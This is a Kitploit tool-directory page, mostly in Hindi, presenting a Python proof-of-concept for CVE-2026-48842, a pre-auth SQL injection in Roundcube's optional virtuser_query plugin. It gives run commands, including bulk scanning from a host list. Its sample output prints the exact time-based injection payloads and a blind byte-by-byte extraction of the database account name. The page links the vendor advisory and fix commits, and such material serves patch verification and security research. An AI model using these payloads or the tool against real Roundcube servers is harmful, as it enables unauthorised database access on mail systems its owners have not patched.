Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-48842 — CVE-2026-48842 के लिए Python PoC, जो Roundcube के virtuser_query plugin में pre-auth SQL injection है। time-based differential के माध्यम से इस flaw की पुष्टि करता है और DB account को blind-read करता है। | Kitploit
उपकरण/GitHubGitHub/4minx/cve-2026-48842
भेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHub4minx/cve-2026-48842

CVE-2026-48842

CVE-2026-48842 के लिए Python PoC, जो Roundcube के virtuser_query plugin में pre-auth SQL injection है। time-based differential के माध्यम से इस flaw की पुष्टि करता है और DB account को blind-read करता है।

रिपॉजिटरी देखें
6घं 50मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-48842 PoC — Roundcube virtuser_query प्री-ऑथ SQLi

CVE-2026-48842 के लिए PoC, जो Roundcube Webmail के वैकल्पिक virtuser_query प्लगइन में एक प्री-ऑथ SQL इंजेक्शन है।

यह टूल दो काम करता है और दोनों में से किसी के बारे में अनुमान लगाने से इनकार करता है:

  1. पुष्टि करता है कि इंजेक्शन मौजूद है, true/false differential के ज़रिए (किसी एक sleep से नहीं)।
  2. प्रभाव साबित करता है, --dumpdbuser के ज़रिए लक्ष्य से डेटाबेस अकाउंट पढ़कर।

यह हर probe द्वारा उत्पन्न सटीक SQL प्रिंट करता है, ताकि असफल या अनिर्णायक परिणाम को कभी भी निष्कर्ष के रूप में प्रस्तुत न किया जाए।


भेद्यता जानकारी

CVECVE-2026-48842
प्रकारCWE-89 — SQL इंजेक्शन
घटकplugins/virtuser_query/virtuser_query.php (डिफ़ॉल्ट रूप से सक्षम नहीं)
प्रभावितRoundcube 1.6.x < 1.6.16, 1.7.x < 1.7.1
ठीक किया गया1.6.16, 1.7.1

आवश्यकताएँ

  • Python 3.9+
  • requests
root@kitploit:~
pip install requests

उपयोग

एकल लक्ष्य, केवल डिटेक्शन

root@kitploit:~
python cve_2026_48842_poc.py https://mail.example.tld

एकल लक्ष्य, DB अकाउंट पढ़कर प्रभाव साबित करें

root@kitploit:~
python cve_2026_48842_poc.py https://mail.example.tld --dumpdbuser

तेज़ oracle (व्यस्त होस्ट को ट्यूनिंग की आवश्यकता हो सकती है)

root@kitploit:~
python cve_2026_48842_poc.py https://mail.example.tld -d 3 --dumpdbuser

कई लक्ष्य

root@kitploit:~
python cve_2026_48842_poc.py --list hosts.txt
python cve_2026_48842_poc.py --list hosts.txt -d 3

विकल्प

तर्कविवरणडिफ़ॉल्ट
targetRoundcube बेस URL, जैसे https://mail.example.tld या http://host/roundcube—
-l, --list FILEफ़ाइल जिसमें प्रति पंक्ति एक लक्ष्य URL हो। # टिप्पणी शुरू करता है।—
-d, --delay Nप्रति oracle probe SLEEP सेकंड7
--dumpdbuserइंजेक्शन की पुष्टि होने पर CURRENT_USER() को ब्लाइंड-रीड करेंबंद
-h, --helpसहायता दिखाएँ—

उदाहरण आउटपुट

स्थानीय Roundcube 1.6.15 के विरुद्ध वास्तविक रन:

root@kitploit:~
[*] http://127.0.0.1/roundcube
    version=1.6.15  noise_floor=0.071s  _token=yes

[1] detection  injected=True  delta(true-false)=6.026s  delta(true-baseline)=6.015s  threshold=1.8s
    baseline                0.083s  http=401  sql_error=None
        _user=poc_baseline_user_9f2a
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='poc_baseline_user_9f2a'
    artifact_unterminated    0.09s  http=401  sql_error=None
        _user=a%5C
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='a\'
    injected_true           6.098s  http=401  sql_error=None
        _user=%5C%27+UNION+SELECT+IF%281%3D1%2CSLEEP%283%29%2C0%29--+-
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='\\' UNION SELECT IF(1=1,SLEEP(3),0)-- -'
    injected_false          0.072s  http=401  sql_error=None
        _user=%5C%27+UNION+SELECT+IF%281%3D2%2CSLEEP%283%29%2C0%29--+-
        SQL 1.6.15: SELECT host FROM virtuser WHERE user='\\' UNION SELECT IF(1=2,SLEEP(3),0)-- -'

[2] blind read of the database account (~42s per byte, no quotes used)
    subquery: SELECT CURRENT_USER()
    length=14 bytes
    [  1/14] 'r'      [  2/14] 'ro'     [  3/14] 'roo'    [  4/14] 'root'
    [  5/14] 'root@'  [  6/14] 'root@l'  [  7/14] 'root@lo' [  8/14] 'root@loc'
    [  9/14] 'root@loca'  [ 10/14] 'root@local'  [ 11/14] 'root@localh'
    [ 12/14] 'root@localho' [ 13/14] 'root@localhos' [ 14/14] 'root@localhost'

[+] database account = 'root@localhost'

☕ सहायता

यदि इस प्रोजेक्ट ने आपकी मदद की, तो इसके विकास में सहयोग देने पर विचार करें:

USDT (TRC-20)

TDCPYioWbZW4iyMCuHhJeFsUZJ88YqZWc1

USDT TRC-20 QR

ETH (ERC-20)

0xf6eA555f95ed5b356fF7a90E6461EbBF6ce105cE

Ethereum QR

संदर्भ

  • Roundcube सुरक्षा सलाह 2026-05-24 — https://roundcube.net/news/2026/05/24/security-updates-1.6.16-and-1.7.1
  • फ़िक्स कमिट (1.6.x) — https://github.com/roundcube/roundcubemail/commit/3406183a9976e36f992d3468f37d0e2346526ee9
  • फ़िक्स कमिट (1.7.x) — https://github.com/roundcube/roundcubemail/commit/87124cc7136a48b5fa9d2b40dfead6e9dcaeaf4b
  • NVD — https://nvd.nist.gov/vuln/detail/CVE-2026-48842
टूल डाउनलोड करें